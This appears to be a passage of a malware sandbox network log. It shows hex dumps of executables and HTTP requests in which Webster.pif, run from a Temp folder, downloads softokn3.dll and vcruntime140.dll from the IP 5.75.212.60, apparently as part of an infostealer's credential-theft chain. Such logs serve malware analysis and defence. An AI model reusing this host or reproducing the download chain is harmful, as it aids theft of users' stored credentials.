                                                                                2024-07-26 15:54:46 UTC16384INData Raw: 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd
                                                                                Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                2024-07-26 15:54:46 UTC16384INData Raw: 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0
                                                                                Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                2024-07-26 15:54:46 UTC16384INData Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57
                                                                                Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
                                                                                2024-07-26 15:54:46 UTC16384INData Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8
                                                                                Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
                                                                                2024-07-26 15:54:46 UTC16384INData Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03
                                                                                Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
                                                                                2024-07-26 15:54:47 UTC16384INData Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00
                                                                                Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|i
                                                                                2024-07-26 15:54:47 UTC16384INData Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01
                                                                                Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.6641815.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:48 UTC242OUTGET /softokn3.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:48 UTC260INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:48 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 257872
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:48 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes
                                                                                2024-07-26 15:54:48 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                2024-07-26 15:54:48 UTC16384INData Raw: 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81
                                                                                Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                2024-07-26 15:54:48 UTC16384INData Raw: 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d
                                                                                Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM
                                                                                2024-07-26 15:54:48 UTC16384INData Raw: 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00
                                                                                Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                2024-07-26 15:54:48 UTC16384INData Raw: 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00
                                                                                Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                2024-07-26 15:54:49 UTC16384INData Raw: 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74
                                                                                Data Ascii: ]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt
                                                                                2024-07-26 15:54:49 UTC16384INData Raw: 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4
                                                                                Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                2024-07-26 15:54:49 UTC16384INData Raw: 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00
                                                                                Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                2024-07-26 15:54:49 UTC16384INData Raw: 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c
                                                                                Data Ascii: ]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|
                                                                                2024-07-26 15:54:49 UTC16384INData Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18
                                                                                Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.6641825.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:50 UTC246OUTGET /vcruntime140.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:50 UTC259INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:50 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 80880
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:50 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes
                                                                                2024-07-26 15:54:50 UTC16125INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                2024-07-26 15:54:50 UTC16384INData Raw: 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42
                                                                                Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;B
                                                                                2024-07-26 15:54:50 UTC16384INData Raw: 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 